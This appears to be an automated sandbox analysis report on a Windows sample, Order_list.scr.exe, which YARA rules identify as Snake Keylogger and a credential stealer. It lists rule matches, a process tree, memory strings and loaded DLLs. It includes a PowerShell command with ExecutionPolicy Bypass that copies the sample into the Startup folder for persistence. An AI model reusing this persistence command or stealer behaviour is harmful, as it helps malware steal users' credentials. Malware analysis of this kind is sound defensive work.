Source: 0.2.Order_list.scr.exe.29568ac.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 5.2.00.exe.3a18e10.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.00.exe.3a18e10.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.00.exe.3a18e10.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 5.2.00.exe.2c76d58.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 5.2.00.exe.3a39840.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.00.exe.3a39840.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.00.exe.3a39840.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 5.2.00.exe.2c79598.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 3.2.Order_list.scr.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.Order_list.scr.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.Order_list.scr.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.Order_list.scr.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000005.00000002.4161249755.0000000003A32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000005.00000002.4161249755.0000000003A68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000005.00000002.4161249755.0000000003A68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000005.00000002.4161249755.0000000003A34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.4170463364.0000000004D40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 00000005.00000002.4161249755.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000003.00000002.4135865956.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000003.00000002.4135865956.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: Order_list.scr.exe PID: 3584, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Order_list.scr.exe PID: 3584, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: 00.exe PID: 7076, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: 00.exe PID: 7076, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: classification engine

Classification label: mal100.spre.troj.adwa.spyw.evad.winEXE@13/12@3/3

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7076:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5928:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4wamnlfk.cxk.ps1

Jump to behavior

Source: Order_list.scr.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Order_list.scr.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\Order_list.scr.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Order_list.scr.exe, 00000003.00000002.4141697018.00000000034FA000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003518000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003509000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.000000000297B000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.0000000002989000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.000000000296B000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Order_list.scr.exe

ReversingLabs: Detection: 63%

Source: unknown	Process created: C:\Users\user\Desktop\Order_list.scr.exe "C:\Users\user\Desktop\Order_list.scr.exe"
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\Order_list.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process created: C:\Users\user\Desktop\Order_list.scr.exe "C:\Users\user\Desktop\Order_list.scr.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe"
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\Order_list.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe'	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process created: C:\Users\user\Desktop\Order_list.scr.exe "C:\Users\user\Desktop\Order_list.scr.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Section loaded: kernel.appcore.dll	Jump to behavior
